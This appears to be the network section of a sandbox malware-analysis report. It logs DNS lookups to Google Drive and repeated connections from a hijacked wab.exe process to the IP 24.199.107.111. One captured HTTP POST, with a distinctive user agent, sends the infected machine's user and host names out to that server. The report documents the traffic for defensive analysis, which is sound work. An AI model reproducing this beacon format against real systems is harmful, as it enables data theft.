                                                                              Apr 18, 2024 21:15:47.228276968 CEST804976224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:47.228303909 CEST804976224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:47.228317022 CEST804976224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:47.228332043 CEST804976224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:47.228399038 CEST4976280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.228445053 CEST4976280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.228704929 CEST4976280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.381792068 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.544357061 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:47.544497013 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.546902895 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.709178925 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:47.709314108 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:47.871884108 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:48.554845095 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:48.554877996 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:48.554894924 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:48.554913044 CEST804976324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:48.554976940 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:48.555016994 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:48.555203915 CEST4976380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:48.704139948 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:48.866765976 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:48.866950989 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:48.869529963 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:49.031894922 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:49.032088041 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:49.194600105 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:49.814682007 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:49.814714909 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:49.814729929 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:49.814748049 CEST804976424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:49.814882994 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:49.814929008 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:49.815107107 CEST4976480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:49.963840008 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:50.126293898 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:50.126463890 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:50.128905058 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:50.291136980 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:50.291285992 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:50.453589916 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.099504948 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.099534035 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.099550962 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.099822998 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.099865913 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.099941015 CEST804976524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.099987030 CEST4976580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.270916939 CEST4976680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.433329105 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.433438063 CEST4976680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.436031103 CEST4976680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.598102093 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:51.598176003 CEST4976680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:51.760364056 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.401158094 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.401199102 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.401211977 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.401221991 CEST804976624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.401324034 CEST4976680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:52.401576996 CEST4976680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:52.561830997 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:52.724797964 CEST804976724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.725075960 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:52.727350950 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:52.889666080 CEST804976724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:52.889916897 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:53.052865028 CEST804976724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:53.718652010 CEST804976724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:53.718671083 CEST804976724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:53.718686104 CEST804976724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:53.718717098 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:53.718750000 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:53.718892097 CEST4976780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:53.872364998 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:54.036063910 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.036349058 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:54.038794994 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:54.202311039 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.202538013 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:54.367537975 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.967627048 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.967659950 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.967679977 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.967701912 CEST804976824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:54.967781067 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:54.967837095 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:54.967982054 CEST4976880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:55.126571894 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:55.289330959 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:55.289478064 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:55.291837931 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:55.454267025 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:55.454407930 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:55.616906881 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.267596960 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.267621040 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.267632008 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.267653942 CEST804976924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.267694950 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.267784119 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.267951012 CEST4976980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.419193983 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.581912041 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.582004070 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.584321022 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.746654987 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:56.746819973 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:56.909224987 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:57.563647985 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:57.563736916 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:57.563750029 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:57.563766003 CEST804977024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:57.563858986 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:57.563858986 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:57.564069986 CEST4977080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:57.717941046 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:57.880693913 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:57.881028891 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:57.883312941 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:58.045857906 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:58.046102047 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:58.208715916 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:58.849102020 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:58.849136114 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:58.849158049 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:58.849262953 CEST804977124.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:58.849288940 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:58.849335909 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:58.849526882 CEST4977180192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:59.004230976 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:59.166778088 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:59.166932106 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:59.169570923 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:59.332005978 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:15:59.332190037 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:15:59.494643927 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.163045883 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.163074970 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.163089991 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.163105965 CEST804977224.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.163147926 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.163219929 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.163330078 CEST4977280192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.318134069 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.481193066 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.481296062 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.483740091 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.646390915 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:00.646531105 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:00.809278011 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.455938101 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.455970049 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.455988884 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.456007957 CEST804977324.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.456051111 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:01.456113100 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:01.456315041 CEST4977380192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:01.589837074 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:01.752643108 CEST804977424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.752789974 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:01.755192041 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:01.917757988 CEST804977424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:01.917861938 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:02.082573891 CEST804977424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:02.759351015 CEST804977424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:02.759387016 CEST804977424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:02.759407997 CEST804977424.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:02.759483099 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:02.759533882 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:02.759685040 CEST4977480192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:02.904669046 CEST4977580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:03.067442894 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:03.067586899 CEST4977580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:03.069976091 CEST4977580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:03.232563019 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:03.232758045 CEST4977580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:03.395505905 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.054766893 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.054825068 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.054843903 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.054864883 CEST804977524.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.055126905 CEST4977580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:04.055200100 CEST4977580192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:04.201035023 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:04.363827944 CEST804977624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.363996983 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:04.366647959 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:04.529023886 CEST804977624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:04.529144049 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:04.691749096 CEST804977624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:05.395215988 CEST804977624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:05.395247936 CEST804977624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:05.395266056 CEST804977624.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:05.395298958 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:05.395327091 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:05.395642996 CEST4977680192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:05.545805931 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:05.708527088 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:05.708720922 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:05.710998058 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:05.873490095 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:05.873667002 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:06.036150932 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:06.684940100 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:06.684983969 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:06.684995890 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:06.685010910 CEST804977724.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:06.685090065 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:06.685141087 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:06.685338974 CEST4977780192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:06.827919960 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:06.990777969 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:06.990914106 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:06.993243933 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:07.155730963 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:07.155816078 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:07.318403959 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:07.945854902 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:07.945898056 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:07.945934057 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:07.945971966 CEST804977824.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:07.946058035 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:07.946100950 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:07.946311951 CEST4977880192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:08.107543945 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:08.270164013 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:08.270347118 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:08.287617922 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:08.450314045 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:08.450423956 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:08.615655899 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:09.262887955 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:09.262954950 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:09.262989998 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:09.263031006 CEST804977924.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:09.263101101 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:09.263101101 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:09.263317108 CEST4977980192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:10.731924057 CEST4978080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:10.894671917 CEST804978024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:10.894845009 CEST4978080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:11.036801100 CEST4978080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:11.199156046 CEST804978024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:11.199219942 CEST4978080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:11.361527920 CEST804978024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:11.996228933 CEST804978024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:11.996256113 CEST804978024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:11.996269941 CEST804978024.199.107.111192.168.2.5
                                                                              Apr 18, 2024 21:16:11.996330976 CEST4978080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:11.996409893 CEST4978080192.168.2.524.199.107.111
                                                                              Apr 18, 2024 21:16:12.572546959 CEST4978080192.168.2.524.199.107.111
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 18, 2024 21:14:06.703533888 CEST6411953192.168.2.51.1.1.1
                                                                              Apr 18, 2024 21:14:06.808423996 CEST53641191.1.1.1192.168.2.5
                                                                              Apr 18, 2024 21:14:07.282423973 CEST5008653192.168.2.51.1.1.1
                                                                              Apr 18, 2024 21:14:07.392637968 CEST53500861.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Apr 18, 2024 21:14:06.703533888 CEST192.168.2.51.1.1.10x349cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:07.282423973 CEST192.168.2.51.1.1.10xa56eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Apr 18, 2024 21:14:00.376308918 CEST1.1.1.1192.168.2.50x6e69No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:00.376308918 CEST1.1.1.1192.168.2.50x6e69No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:06.808423996 CEST1.1.1.1192.168.2.50x349cNo error (0)drive.google.com173.194.219.138A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:06.808423996 CEST1.1.1.1192.168.2.50x349cNo error (0)drive.google.com173.194.219.102A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:06.808423996 CEST1.1.1.1192.168.2.50x349cNo error (0)drive.google.com173.194.219.101A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:06.808423996 CEST1.1.1.1192.168.2.50x349cNo error (0)drive.google.com173.194.219.139A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:06.808423996 CEST1.1.1.1192.168.2.50x349cNo error (0)drive.google.com173.194.219.100A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:06.808423996 CEST1.1.1.1192.168.2.50x349cNo error (0)drive.google.com173.194.219.113A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:07.392637968 CEST1.1.1.1192.168.2.50xa56eNo error (0)drive.usercontent.google.com173.194.219.132A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:17.936170101 CEST1.1.1.1192.168.2.50x4576No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:17.936170101 CEST1.1.1.1192.168.2.50x4576No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:31.258369923 CEST1.1.1.1192.168.2.50xe41cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                              Apr 18, 2024 21:14:31.258369923 CEST1.1.1.1192.168.2.50xe41cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              • drive.google.com
                                                                              • drive.usercontent.google.com
                                                                              • 24.199.107.111
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.54971724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:14:51.563443899 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 180
                                                                              Connection: close
                                                                              Apr 18, 2024 21:14:51.726706028 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: 'ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2CejPSv
                                                                              Apr 18, 2024 21:14:52.517329931 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:14:51 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 